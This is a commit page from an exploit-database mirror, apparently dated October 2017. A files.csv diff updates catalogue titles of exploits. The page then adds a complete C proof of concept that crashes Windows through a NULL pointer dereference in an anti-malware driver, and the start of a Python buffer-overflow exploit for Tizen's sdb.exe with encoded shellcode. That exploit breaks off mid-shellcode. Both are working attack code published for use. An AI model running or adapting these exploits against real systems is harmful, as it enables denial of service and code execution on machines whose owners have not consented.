bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2017-10-28

Browse source 
3 new exploits

Boloto Media Player 1.0.0.9 - pls file Denial of Service
Boloto Media Player 1.0.0.9 - '.pls' File Denial of Service

HP Operations Manager 8.16 - 'srcvw4.dll' LoadFile()/SaveFile() Remote Unicode Stack Overflow (PoC)
HP Operations Manager 8.16 - 'srcvw4.dll' 'LoadFile()'/'SaveFile()' Remote Unicode Stack Overflow (PoC)

id software quake ii server 3.2 - Multiple Vulnerabilities
ID Software Quake II Server 3.2 - Multiple Vulnerabilities

Couchdb 1.5.0 - uuids Denial of Service
Couchdb 1.5.0 - 'uuids' Denial of Service
Watchdog Development Anti-Malware / Online Security Pro - NULL Pointer Dereference
Tizen Studio 1.3 Smart Development Bridge <2.3.2 - Buffer Overflow (PoC)

Oracle 10g - LT.FINDRICSET SQL Injection (IDS evasion)
Oracle 10g - 'LT.FINDRICSET' SQL Injection (IDS Evasion)

Linux Kernel < 2.6.22 - 'ftruncate()/open()' Privilege Escalation
Linux Kernel < 2.6.22 - 'ftruncate()'/'open()' Privilege Escalation

MinaliC WebServer 1.0 - Remote Source Disclosure/File Download
MinaliC WebServer 1.0 - Remote Source Disclosure / File Download

PcVue 10.0 SV.UIGrdCtrl.1 - 'LoadObject()/SaveObject()' Trusted DWORD (Metasploit)
PcVue 10.0 SV.UIGrdCtrl.1 - 'LoadObject()'/'SaveObject()' Trusted DWORD (Metasploit)

ISC BIND 8.1 - host Remote Buffer Overflow
ISC BIND 8.1 - Host Remote Buffer Overflow

Mozilla Firefox 3.5.3 and SeaMonkey 1.1.17 - 'libpr0n' GIF Parser Heap Based Buffer Overflow
Mozilla Firefox 3.5.3 / SeaMonkey 1.1.17 - 'libpr0n' .GIF Parser Heap Based Buffer Overflow

DameWare Remote Controller <= 12.0.0.520 - Remote Code Execution

RunCMS 1.6 - Blind SQL Injection (IDS evasion)
RunCMS 1.6 - Blind SQL Injection (IDS Evasion)

glFusion 1.1.2 - COM_applyFilter()/order SQL Injection
glFusion 1.1.2 - 'COM_applyFilter()/order' SQL Injection

glFusion 1.1.2 - COM_applyFilter()/cookies Blind SQL Injection
glFusion 1.1.2 - 'COM_applyFilter()/cookies' Blind SQL Injection

Geeklog 1.5.2 - savepreferences()/*blocks[] SQL Injection
Geeklog 1.5.2 - 'savepreferences()/*blocks[]' SQL Injection
This commit is contained in:
Offensive Security 2017-10-28 05:01:35 +00:00
parent e515bac4fe
commit b4050a4e4b
4 changed files with 413 additions and 14 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

31
files.csv
View file

@ -1223,7 +1223,7 @@ id,file,description,date,author,platform,type,port
9823,platforms/solaris/dos/9823.c,"Sun Solaris 10 RPC dmispd - Denial of Service",2009-09-24,"Jeremy Brown",solaris,dos,0
9845,platforms/osx/dos/9845.c,"Apple Mac OSX 10.5.6/10.5.7 - ptrace mutex Denial of Service",2009-11-05,prdelka,osx,dos,0
9852,platforms/windows/dos/9852.py,"Home FTP Server 1.10.1.139 - 'SITE INDEX' Remote Denial of Service",2009-11-16,zhangmc,windows,dos,21
9871,platforms/windows/dos/9871.txt,"Boloto Media Player 1.0.0.9 - pls file Denial of Service",2009-10-27,Dr_IDE,windows,dos,0
9871,platforms/windows/dos/9871.txt,"Boloto Media Player 1.0.0.9 - '.pls' File Denial of Service",2009-10-27,Dr_IDE,windows,dos,0
9874,platforms/windows/dos/9874.txt,"Cherokee Web server 0.5.4 - Denial of Service",2009-10-26,"Usman Saeed",windows,dos,0
9879,platforms/windows/dos/9879.txt,"EMC RepliStor Server 6.3.1.3 - Denial of Service",2009-10-20,bellick,windows,dos,7144
9881,platforms/windows/dos/9881.txt,"Eureka Email Client 2.2q - Buffer Overflow (PoC)",2009-10-23,"Francis Provencher",windows,dos,110
@ -1506,7 +1506,7 @@ id,file,description,date,author,platform,type,port
12274,platforms/windows/dos/12274.py,"Multiple Vendor AgentX++ - Stack Buffer Overflow",2010-04-17,ZSploit.com,windows,dos,0
12294,platforms/windows/dos/12294.txt,"Avtech Software - ActiveX 'avc781viewer.dll' Multiple Vulnerabilities",2010-04-19,LiquidWorm,windows,dos,0
12297,platforms/hardware/dos/12297.txt,"Huawei EchoLife HG520c - Modem Reset (Denial of Service)",2010-04-19,hkm,hardware,dos,0
12302,platforms/windows/dos/12302.html,"HP Operations Manager 8.16 - 'srcvw4.dll' LoadFile()/SaveFile() Remote Unicode Stack Overflow (PoC)",2010-04-20,mr_me,windows,dos,0
12302,platforms/windows/dos/12302.html,"HP Operations Manager 8.16 - 'srcvw4.dll' 'LoadFile()'/'SaveFile()' Remote Unicode Stack Overflow (PoC)",2010-04-20,mr_me,windows,dos,0
12314,platforms/windows/dos/12314.py,"Speed Commander 13.10 - '.zip' Memory Corruption",2010-04-20,TecR0c,windows,dos,0
12324,platforms/multiple/dos/12324.py,"Multiple Browsers - Audio Tag Denial of Service",2010-04-21,"Chase Higgins",multiple,dos,0
12334,platforms/linux/dos/12334.c,"OpenSSL - Remote Denial of Service",2010-04-22,Andi,linux,dos,0
@ -3261,7 +3261,7 @@ id,file,description,date,author,platform,type,port
24699,platforms/windows/dos/24699.txt,"Microsoft Windows XP - '.WAV' File Handler Denial of Service",2004-10-22,HexView,windows,dos,0
24705,platforms/windows/dos/24705.txt,"Microsoft Internet Explorer 6 - Font Tag Denial of Service",2004-10-26,"Jehiah Czebotar",windows,dos,0
24708,platforms/windows/dos/24708.txt,"Quicksilver Master of Orion III 1.2.5 - Multiple Remote Denial of Service Vulnerabilities",2004-10-27,"Luigi Auriemma",windows,dos,0
24710,platforms/multiple/dos/24710.txt,"id software quake ii server 3.2 - Multiple Vulnerabilities",2004-10-27,"Richard Stanway",multiple,dos,0
24710,platforms/multiple/dos/24710.txt,"ID Software Quake II Server 3.2 - Multiple Vulnerabilities",2004-10-27,"Richard Stanway",multiple,dos,0
24715,platforms/multiple/dos/24715.txt,"Caudium 1.x - Remote Denial of Service",2004-10-30,"David Gourdelier",multiple,dos,0
24726,platforms/windows/dos/24726.txt,"Software602 602 LAN Suite - Multiple Remote Denial of Service Vulnerabilities",2004-11-06,"Luigi Auriemma",windows,dos,0
24733,platforms/windows/dos/24733.pl,"SecureAction Research Secure Network Messenger 1.4.x - Remote Denial of Service",2004-11-12,"Luigi Auriemma",windows,dos,0
@ -4095,7 +4095,7 @@ id,file,description,date,author,platform,type,port
32481,platforms/windows/dos/32481.txt,"Light Audio Player 1.0.14 - Memory Corruption (PoC)",2014-03-24,"TUNISIAN CYBER",windows,dos,0
32482,platforms/windows/dos/32482.py,"GOM Media Player (GOMMP) 2.2.56.5183 - Memory Corruption (PoC)",2014-03-24,"TUNISIAN CYBER",windows,dos,0
32483,platforms/windows/dos/32483.py,"GOM Video Converter 1.1.0.60 - '.wav' Memory Corruption (PoC)",2014-03-24,"TUNISIAN CYBER",windows,dos,0
32519,platforms/multiple/dos/32519.txt,"Couchdb 1.5.0 - uuids Denial of Service",2014-03-26,"Krusty Hack",multiple,dos,0
32519,platforms/multiple/dos/32519.txt,"Couchdb 1.5.0 - 'uuids' Denial of Service",2014-03-26,"Krusty Hack",multiple,dos,0
32513,platforms/windows/dos/32513.py,"Haihaisoft HUPlayer 1.0.4.8 - '.m3u' / '.pls' / '.asx' Buffer Overflow (SEH)",2014-03-25,"Gabor Seljan",windows,dos,0
32514,platforms/windows/dos/32514.py,"Haihaisoft Universal Player 1.5.8 - '.m3u' / '.pls '/ '.asx' Buffer Overflow (SEH)",2014-03-25,"Gabor Seljan",windows,dos,0
32522,platforms/windows/dos/32522.py,"VirusChaser 8.0 - Stack Buffer Overflow",2014-03-26,wh1ant,windows,dos,0
@ -5721,6 +5721,8 @@ id,file,description,date,author,platform,type,port
43014,platforms/linux/dos/43014.txt,"Xen - Unbounded Recursion in Pagetable De-typing",2017-10-18,"Google Security Research",linux,dos,0
43020,platforms/multiple/dos/43020.txt,"Mozilla Firefox < 55 - Denial of Service",2017-10-20,"Amit Sangra",multiple,dos,0
43026,platforms/windows/dos/43026.py,"ArGoSoft Mini Mail Server 1.0.0.2 - Denial of Service",2017-10-21,"Berk Cem Göksel",windows,dos,0
43058,platforms/windows/dos/43058.c,"Watchdog Development Anti-Malware / Online Security Pro - NULL Pointer Dereference",2017-10-26,"Parvez Anwar",windows,dos,0
43060,platforms/windows/dos/43060.py,"Tizen Studio 1.3 Smart Development Bridge <2.3.2 - Buffer Overflow (PoC)",2017-10-27,"Marcin Kopec",windows,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -6236,7 +6238,7 @@ id,file,description,date,author,platform,type,port
4564,platforms/multiple/local/4564.txt,"Oracle 10g - 'CTX_DOC.MARKUP' SQL Injection",2007-10-23,sh2kerr,multiple,local,0
4570,platforms/multiple/local/4570.pl,"Oracle 10g/11g - 'SYS.LT.FINDRICSET' SQL Injection (1)",2007-10-27,bunker,multiple,local,0
4571,platforms/multiple/local/4571.pl,"Oracle 10g/11g - 'SYS.LT.FINDRICSET' SQL Injection (2)",2007-10-27,bunker,multiple,local,0
4572,platforms/multiple/local/4572.txt,"Oracle 10g - LT.FINDRICSET SQL Injection (IDS evasion)",2007-10-27,sh2kerr,multiple,local,0
4572,platforms/multiple/local/4572.txt,"Oracle 10g - 'LT.FINDRICSET' SQL Injection (IDS Evasion)",2007-10-27,sh2kerr,multiple,local,0
4583,platforms/windows/local/4583.py,"Sony CONNECT Player 4.x - '.m3u' Local Stack Overflow",2007-10-29,TaMBaRuS,windows,local,0
4584,platforms/windows/local/4584.c,"Kodak Image Viewer - TIF/TIFF Code Execution (PoC) (MS07-055)",2007-10-29,"Gil-Dong / Woo-Chi",windows,local,0
4612,platforms/aix/local/4612.py,"IBM AIX 5.3.0 - 'setlocale()' Privilege Escalation",2007-11-07,"Thomas Pollet",aix,local,0
@ -6305,7 +6307,7 @@ id,file,description,date,author,platform,type,port
6798,platforms/windows/local/6798.pl,"VideoLAN VLC Media Player 0.9.4 - '.TY' File Stack Based Buffer Overflow",2008-10-21,"Guido Landi",windows,local,0
6825,platforms/windows/local/6825.pl,"VideoLAN VLC Media Player 0.9.4 - '.ty' Buffer Overflow (SEH)",2008-10-23,"Guido Landi",windows,local,0
6831,platforms/windows/local/6831.cpp,"TugZip 3.00 Archiver - '.zip' Local Buffer Overflow",2008-10-24,"fl0 fl0w",windows,local,0
6851,platforms/linux/local/6851.c,"Linux Kernel < 2.6.22 - 'ftruncate()/open()' Privilege Escalation",2008-10-27,gat3way,linux,local,0
6851,platforms/linux/local/6851.c,"Linux Kernel < 2.6.22 - 'ftruncate()'/'open()' Privilege Escalation",2008-10-27,gat3way,linux,local,0
6994,platforms/windows/local/6994.txt,"Adobe Reader - 'util.printf()' JavaScript Function Stack Overflow (1)",2008-11-05,Elazar,windows,local,0
7006,platforms/windows/local/7006.txt,"Adobe Reader - 'util.printf()' JavaScript Function Stack Overflow (2)",2008-11-05,"Debasis Mohanty",windows,local,0
7051,platforms/windows/local/7051.pl,"VideoLAN VLC Media Player < 0.9.6 - '.rt' Stack Buffer Overflow",2008-11-07,SkD,windows,local,0
@ -10935,7 +10937,7 @@ id,file,description,date,author,platform,type,port
15298,platforms/multiple/remote/15298.txt,"Sawmill Enterprise < 8.1.7.3 - Multiple Vulnerabilities",2010-10-21,"SEC Consult",multiple,remote,0
15318,platforms/linux/remote/15318.txt,"NitroSecurity ESM 8.4.0a - Remote Code Execution",2010-10-26,"Filip Palian",linux,remote,0
15333,platforms/windows/remote/15333.txt,"MinaliC WebServer 1.0 - Directory Traversal",2010-10-27,"John Leitch",windows,remote,0
15336,platforms/windows/remote/15336.txt,"MinaliC WebServer 1.0 - Remote Source Disclosure/File Download",2010-10-27,Dr_IDE,windows,remote,0
15336,platforms/windows/remote/15336.txt,"MinaliC WebServer 1.0 - Remote Source Disclosure / File Download",2010-10-27,Dr_IDE,windows,remote,0
15337,platforms/windows/remote/15337.py,"DATAC RealWin SCADA Server 1.06 - Buffer Overflow",2010-10-27,blake,windows,remote,0
15347,platforms/windows/remote/15347.py,"XBMC 9.04.1r20672 - soap_action_name post upnp sscanf Buffer Overflow",2010-10-28,n00b,windows,remote,0
15349,platforms/windows/remote/15349.txt,"Home FTP Server 1.11.1.149 - Authenticated Directory Traversal",2010-10-29,chr1x,windows,remote,0
@ -11697,7 +11699,7 @@ id,file,description,date,author,platform,type,port
17969,platforms/multiple/remote/17969.py,"Apache mod_proxy - Reverse Proxy Exposure (PoC)",2011-10-11,"Rodrigo Marcos",multiple,remote,0
17960,platforms/windows/remote/17960.rb,"Opera Browser 10/11/12 - 'SVG Layout' Memory Corruption (Metasploit)",2011-10-10,"Jose A. Vazquez",windows,remote,0
17974,platforms/windows/remote/17974.html,"Mozilla Firefox - 'Array.reduceRight()' Integer Overflow (1)",2011-10-12,ryujin,windows,remote,0
17975,platforms/windows/remote/17975.rb,"PcVue 10.0 SV.UIGrdCtrl.1 - 'LoadObject()/SaveObject()' Trusted DWORD (Metasploit)",2011-10-12,Metasploit,windows,remote,0
17975,platforms/windows/remote/17975.rb,"PcVue 10.0 SV.UIGrdCtrl.1 - 'LoadObject()'/'SaveObject()' Trusted DWORD (Metasploit)",2011-10-12,Metasploit,windows,remote,0
17976,platforms/windows/remote/17976.rb,"Mozilla Firefox - 'Array.reduceRight()' Integer Overflow (Metasploit) (2)",2011-10-13,Metasploit,windows,remote,0
17977,platforms/windows/remote/17977.txt,"JBoss AS 2.0 - Remote Exploit",2011-10-11,kingcope,windows,remote,0
17986,platforms/osx/remote/17986.rb,"Apple Safari - 'file://' Arbitrary Code Execution (Metasploit)",2011-10-17,Metasploit,osx,remote,0
@ -12305,7 +12307,7 @@ id,file,description,date,author,platform,type,port
20370,platforms/cgi/remote/20370.txt,"Kootenay Web Inc whois 1.0 - Remote Command Execution",2000-10-29,"Mark Stratman",cgi,remote,0
20371,platforms/windows/remote/20371.txt,"Microsoft Windows 95/WfW - smbclient Directory Traversal",1995-10-30,"Dan Shearer",windows,remote,0
20372,platforms/hardware/remote/20372.pl,"Cisco Virtual Central Office 4000 (VCO/4K) 5.1.3 - Remote Username / Password Retrieval",2000-10-26,@stake,hardware,remote,0
20374,platforms/unix/remote/20374.c,"ISC BIND 8.1 - host Remote Buffer Overflow",2000-10-27,antirez,unix,remote,0
20374,platforms/unix/remote/20374.c,"ISC BIND 8.1 - Host Remote Buffer Overflow",2000-10-27,antirez,unix,remote,0
20375,platforms/windows/remote/20375.txt,"Sun Java Web Server 1.1 Beta - Viewable .jhtml Source",1997-07-16,"Brian Krahmer",windows,remote,0
20384,platforms/windows/remote/20384.txt,"Microsoft IIS 4.0/5.0 - Executable File Parsing",2000-11-06,Nsfocus,windows,remote,0
20387,platforms/cgi/remote/20387.txt,"YaBB 9.11.2000 - search.pl Arbitrary Command Execution",2000-11-07,rpc,cgi,remote,0
@ -14773,7 +14775,7 @@ id,file,description,date,author,platform,type,port
33645,platforms/windows/remote/33645.py,"httpdx 1.5 - 'MKD' Directory Traversal",2010-02-15,fb1h2s,windows,remote,0
33310,platforms/multiple/remote/33310.nse,"VMware Server 2.0.1 / ESXi Server 3.5 - Directory Traversal",2009-10-27,"Justin Morehouse",multiple,remote,0
33311,platforms/linux/remote/33311.txt,"KDE 4.3.2 - Multiple Input Validation Vulnerabilities",2009-10-27,"Tim Brown",linux,remote,0
33313,platforms/linux/remote/33313.txt,"Mozilla Firefox 3.5.3 and SeaMonkey 1.1.17 - 'libpr0n' GIF Parser Heap Based Buffer Overflow",2009-10-27,regenrecht,linux,remote,0
33313,platforms/linux/remote/33313.txt,"Mozilla Firefox 3.5.3 / SeaMonkey 1.1.17 - 'libpr0n' .GIF Parser Heap Based Buffer Overflow",2009-10-27,regenrecht,linux,remote,0
33315,platforms/linux/remote/33315.java,"Sun Java SE November 2009 - Multiple Vulnerabilities (1)",2009-10-29,Tometzky,linux,remote,0
33316,platforms/multiple/remote/33316.java,"Sun Java SE November 2009 - Multiple Vulnerabilities (2)",2009-10-29,Tometzky,multiple,remote,0
33594,platforms/windows/remote/33594.txt,"Microsoft Windows Vista/2008 - ICMPv6 Router Advertisement Remote Code Execution",2010-02-09,"Sumit Gwalani",windows,remote,0
@ -15927,6 +15929,7 @@ id,file,description,date,author,platform,type,port
43031,platforms/lin_x86/remote/43031.rb,"Unitrends UEB 9 - bpserverd Authentication Bypass Remote Command Execution (Metasploit)",2017-10-23,Metasploit,lin_x86,remote,1743
43032,platforms/unix/remote/43032.rb,"Polycom - Command Shell Authorization Bypass (Metasploit)",2017-10-23,Metasploit,unix,remote,0
43055,platforms/hardware/remote/43055.rb,"Netgear DGN1000 1.1.00.48 - 'Setup.cgi' Unauthenticated Remote Code Execution (Metasploit)",2017-10-25,Metasploit,hardware,remote,0
43059,platforms/windows/remote/43059.py,"DameWare Remote Controller <= 12.0.0.520 - Remote Code Execution",2016-04-03,Securifera,windows,remote,0
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -18968,7 +18971,7 @@ id,file,description,date,author,platform,type,port
4789,platforms/php/webapps/4789.php,"PMOS Help Desk 2.4 - Remote Command Execution",2007-12-25,EgiX,php,webapps,0
4790,platforms/php/webapps/4790.txt,"RunCMS 1.6 - Multiple Vulnerabilities",2007-12-25,DSecRG,php,webapps,0
4791,platforms/php/webapps/4791.txt,"eSyndiCat Link Exchange Script 2005-2006 - SQL Injection",2007-12-25,EgiX,php,webapps,0
4792,platforms/php/webapps/4792.pl,"RunCMS 1.6 - Blind SQL Injection (IDS evasion)",2007-12-26,sh2kerr,php,webapps,0
4792,platforms/php/webapps/4792.pl,"RunCMS 1.6 - Blind SQL Injection (IDS Evasion)",2007-12-26,sh2kerr,php,webapps,0
4793,platforms/php/webapps/4793.txt,"Blakord Portal Beta 1.3.A (All Modules) - SQL Injection",2007-12-26,JosS,php,webapps,0
4794,platforms/php/webapps/4794.pl,"XZero Community Classifieds 4.95.11 - Local File Inclusion / SQL Injection",2007-12-26,Kw3[R]Ln,php,webapps,0
4795,platforms/php/webapps/4795.txt,"XZero Community Classifieds 4.95.11 - Remote File Inclusion",2007-12-26,Kw3[R]Ln,php,webapps,0
@ -21556,7 +21559,7 @@ id,file,description,date,author,platform,type,port
8296,platforms/php/webapps/8296.txt,"Arcadwy Arcade Script - 'Username' Static Cross-Site Scripting",2009-03-27,"Anarchy Angel",php,webapps,0
8297,platforms/php/webapps/8297.txt,"Moodle < 1.6.9/1.7.7/1.8.9/1.9.5 - File Disclosure",2009-03-27,"Christian J. Eibl",php,webapps,0
8298,platforms/php/webapps/8298.pl,"My Simple Forum 7.1 - Remote Command Execution",2009-03-27,Osirys,php,webapps,0
8302,platforms/php/webapps/8302.php,"glFusion 1.1.2 - COM_applyFilter()/order SQL Injection",2009-03-29,Nine:Situations:Group,php,webapps,0
8302,platforms/php/webapps/8302.php,"glFusion 1.1.2 - 'COM_applyFilter()/order' SQL Injection",2009-03-29,Nine:Situations:Group,php,webapps,0
8304,platforms/php/webapps/8304.txt,"Arcadwy Arcade Script - (Authentication Bypass) Insecure Cookie Handling",2009-03-29,ZoRLu,php,webapps,0
8305,platforms/php/webapps/8305.txt,"iWare CMS 5.0.4 - Multiple SQL Injections",2009-03-29,boom3rang,php,webapps,0
8307,platforms/asp/webapps/8307.txt,"Diskos CMS Manager - SQL Injection / File Disclosure / Authentication Bypass",2009-03-30,AnGeL25dZ,asp,webapps,0
@ -21577,7 +21580,7 @@ id,file,description,date,author,platform,type,port
8341,platforms/php/webapps/8341.txt,"MyioSoft Ajax Portal 3.0 - 'page' SQL Injection",2009-04-01,cOndemned,php,webapps,0
8342,platforms/php/webapps/8342.txt,"TinyPHPForum 3.61 - File Disclosure / Code Execution",2009-04-01,brain[pillow],php,webapps,0
8346,platforms/php/webapps/8346.txt,"ActiveKB KnowledgeBase - 'Panel' Local File Inclusion",2009-04-03,"Angela Chang",php,webapps,0
8347,platforms/php/webapps/8347.php,"glFusion 1.1.2 - COM_applyFilter()/cookies Blind SQL Injection",2009-04-03,Nine:Situations:Group,php,webapps,0
8347,platforms/php/webapps/8347.php,"glFusion 1.1.2 - 'COM_applyFilter()/cookies' Blind SQL Injection",2009-04-03,Nine:Situations:Group,php,webapps,0
8348,platforms/php/webapps/8348.txt,"form2list - 'page.php?id' SQL Injection",2009-04-03,Cyber-Zone,php,webapps,0
8349,platforms/php/webapps/8349.c,"Family Connections 1.8.2 - Arbitrary File Upload",2009-04-03,"Salvatore Fresta",php,webapps,0
8350,platforms/php/webapps/8350.txt,"Gravity Board X 2.0 Beta - SQL Injection / Authenticated Code Execution",2009-04-03,brain[pillow],php,webapps,0
@ -21632,7 +21635,7 @@ id,file,description,date,author,platform,type,port
8442,platforms/php/webapps/8442.txt,"Job2C - 'conf.inc' Config File Disclosure",2009-04-15,InjEctOr5,php,webapps,0
8443,platforms/php/webapps/8443.txt,"Job2C 4.2 - 'adtype' Local File Inclusion",2009-04-15,ZoRLu,php,webapps,0
8446,platforms/php/webapps/8446.txt,"FreeWebShop.org 2.2.9 RC2 - 'lang_file' Local File Inclusion",2009-04-15,ahmadbady,php,webapps,0
8448,platforms/php/webapps/8448.php,"Geeklog 1.5.2 - savepreferences()/*blocks[] SQL Injection",2009-04-16,Nine:Situations:Group,php,webapps,0
8448,platforms/php/webapps/8448.php,"Geeklog 1.5.2 - 'savepreferences()/*blocks[]' SQL Injection",2009-04-16,Nine:Situations:Group,php,webapps,0
8449,platforms/php/webapps/8449.txt,"NetHoteles 2.0/3.0 - Authentication Bypass",2009-04-16,Dns-Team,php,webapps,0
8450,platforms/php/webapps/8450.txt,"Online Password Manager 4.1 - Insecure Cookie Handling",2009-04-16,ZoRLu,php,webapps,0
8453,platforms/php/webapps/8453.txt,"webSPELL 4.2.0c - Bypass BBCode Cross-Site Scripting Cookie Stealing",2009-04-16,YEnH4ckEr,php,webapps,0

Can't render this file because it is too large.

141
platforms/windows/dos/43058.c Executable file
View file

@ -0,0 +1,141 @@
/*
Exploit Title - Watchdog Development Anti-Malware/Online Security Pro Null Pointer Dereference
Date - 26th October 2017
Discovered by - Parvez Anwar (@parvezghh)
Vendor Homepage - https://www.watchdogdevelopment.com/
Tested Version - 2.74.186.150
Driver Version - 2.21.63 - zam32.sys
Tested on OS - 32bit Windows 7 SP1
CVE IDs - CVE-2017-15920 and CVE-2017-15921
Vendor fix url - Will be fixed in a future release
Fixed Version - n/a
Fixed driver ver - n/a
A null pointer dereference vulnerability is triggered when sending an operation
to ioctls 0x80002010 or 0x80002054. This is due to input buffer being NULL or
the input buffer size being 0 as they are not validated.
kd> dt nt!_irp @esi -r
+0x000 Type : 0n6
+0x002 Size : 0x94
+0x004 MdlAddress : (null)
+0x008 Flags : 0x60000
+0x00c AssociatedIrp : <unnamed-tag>
+0x000 MasterIrp : (null)
+0x000 IrpCount : 0n0
+0x000 SystemBuffer : (null) <----------- null pointer
0x80002010
----------
CVE-2017-15921
kd> r
eax=00000000 ebx=80002010 ecx=cff82bd9 edx=90889f2e esi=00000000 edi=c0000001
eip=9087cd9f esp=a7a80ab8 ebp=a7a80ab8 iopl=0 nv up ei pl nz na po nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00000202
zam32+0xdd9f:
9087cd9f ff30 push dword ptr [eax] ds:0023:00000000=????????
.text:90AD9104 push offset aIoctl_register ; "IOCTL_REGISTER_PROCESS"
.text:90AD9109 push 0
.text:90AD910B push edx ; Pointer to "DeviceIoControlHandler" string
.text:90AD910C push 208h
.text:90AD9111 push offset aMain_c
.text:90AD9116 push 1
.text:90AD9118 call sub_90AD3ADA
.text:90AD911D add esp, 18h
.text:90AD9120 push esi ; esi is null becomes arg_0 otherwise would point to our input "SystemBuffer"
.text:90AD9121 call sub_90AD8D90
.text:90AD8D90 sub_90AD8D90 proc near
.text:90AD8D90
.text:90AD8D90 arg_0 = dword ptr 8
.text:90AD8D90
.text:90AD8D90 push ebp
.text:90AD8D91 mov ebp, esp
.text:90AD8D93 call sub_90AD414A
.text:90AD8D98 test eax, eax
.text:90AD8D9A jz short loc_90AD8DA6
.text:90AD8D9C mov eax, [ebp+arg_0] ; Null pointer dereference
.text:90AD8D9F push dword ptr [eax] ; BSOD !!!!
.text:90AD8DA1 call sub_90AD428C
.text:90AD8DA6
.text:90AD8DA6 loc_90AD8DA6:
.text:90AD8DA6 pop ebp
.text:90AD8DA7 retn 4
.text:90AD8DA7 sub_90AD8D90 endp
.text:90AD8DA7
.text:90AD8DAA
0x80002054
----------
CVE-2017-15920
kd> r
eax=861e8320 ebx=80002054 ecx=cff82bd9 edx=90889f2e esi=00000000 edi=c0000001
eip=9087d41a esp=99f4eaac ebp=99f4eadc iopl=0 nv up ei pl zr na pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00000246
zam32+0xe41a:
9087d41a c7061e010000 mov dword ptr [esi],11Eh ds:0023:00000000=????????
.text:90AD9401 push offset aIoctl_get_driv ; IOCTL_GET_DRIVER_PROTOCOL
.text:90AD9406 push 0
.text:90AD9408 push edx
.text:90AD9409 push 2A3h
.text:90AD940E push offset aMain_c
.text:90AD9413 push 1
.text:90AD9415 call sub_90AD3ADA
.text:90AD941A mov dword ptr [esi], 11Eh ; BSOD !!!! Null pointer dereference otherwise would point to our input "SystemBuffer"
.text:90AD9420 jmp loc_90AD9622
*/
#include <stdio.h>
#include <windows.h>
int main(int argc, char *argv[])
{
HANDLE hDevice;
char devhandle[MAX_PATH];
DWORD dwRetBytes = 0;
sprintf(devhandle, "\\\\.\\%s", "zemanaantimalware");
hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
if(hDevice == INVALID_HANDLE_VALUE)
{
printf("\n[-] Open %s device failed\n\n", devhandle);
return -1;
}
else
{
printf("\n[+] Open %s device successful", devhandle);
}
printf("\n[~] Press any key to continue . . .");
getch();
DeviceIoControl(hDevice, 0x80002010, NULL, 0, NULL, 0, &dwRetBytes, NULL);
// DeviceIoControl(hDevice, 0x80002054, NULL, 0, NULL, 0, &dwRetBytes, NULL);
printf("\n[+] DoSed\n\n");
CloseHandle(hDevice);
return 0;
}

176
platforms/windows/dos/43060.py Executable file
View file

@ -0,0 +1,176 @@
# Exploit Title: Smart Development Bridge <=2.3.2 (part of Tizen Studio 1.3 Windows x86/x64) - Buffer Overflow PoC
# Date: 22.10.17
# Exploit Author: Marcin Kopec
# Vendor Homepage: https://developer.tizen.org/
# Software Link: https://developer.tizen.org/development/tizen-studio/download#
# Version: 2.3.0, 2.3.2 (some older versions are affected as well)
# Tested on: Microsoft Windows [Version 10.0.16299.19]
# 2.3.2 (sdb.exe can be extracted from Tizen Studio 1.3 for Windows x86/x64 installation package):
# e88de99ee069412b7612d85c00aa62fc sdb.exe
# 2.3.0:
# f9fd3896195900ec604c6f182a411e18 sdb.exe
# The file can be located in "tools" subdirectory after the extraction
# This code has been created for educational purposes only, to raise awareness on software security, and it's harmless
# by intention (the PoC runs calc.exe). Please do not change the code behaviour to malicious
# Vulnerability Discovery History
# 28/Jul/16 - Tizen Project has been informed about the vulnerability (https://bugs.tizen.org/browse/TM-249)
# 28/Jul/16 - Got suggestion from CL to inform Tizen Mobile project
# 29/Jul/16 - Moved the issue to Tizen Mobile project
# - NO RESPONSE -
# 7/Sep/16 - Escalated through Samsung security contact (BZ)
# 14/Nov/16 - Got informed by BZ that HQ is dealing with the issue with no further details
# - NO RESPONSE -
# 02/Oct/17 - Tizen Mobile project has been informed about plans to release PoC on exploit-db
# - NO RESPONSE -
# 22/Oct/17 - The PoC submitted to exploit-db
import struct
import subprocess
import sys
ARGS = " launch A A A A A "
def tech_direct_exec(sdb_path):
# msfvenom -a x86 --platform Windows -p windows/exec CMD=calc -e x86/shikata_ga_nai \
# -b '\x00\x20\x0a\x0d\x1b\x0b\x0c' -f python
buf = ""
buf += "\xb8\xb6\x98\xe6\xfa\xdb\xcb\xd9\x74\x24\xf4\x5b\x31"
buf += "\xc9\xb1\x30\x31\x43\x13\x83\xeb\xfc\x03\x43\xb9\x7a"
buf += "\x13\x06\x2d\xf8\xdc\xf7\xad\x9d\x55\x12\x9c\x9d\x02"
buf += "\x56\x8e\x2d\x40\x3a\x22\xc5\x04\xaf\xb1\xab\x80\xc0"
buf += "\x72\x01\xf7\xef\x83\x3a\xcb\x6e\x07\x41\x18\x51\x36"
buf += "\x8a\x6d\x90\x7f\xf7\x9c\xc0\x28\x73\x32\xf5\x5d\xc9"
buf += "\x8f\x7e\x2d\xdf\x97\x63\xe5\xde\xb6\x35\x7e\xb9\x18"
buf += "\xb7\x53\xb1\x10\xaf\xb0\xfc\xeb\x44\x02\x8a\xed\x8c"
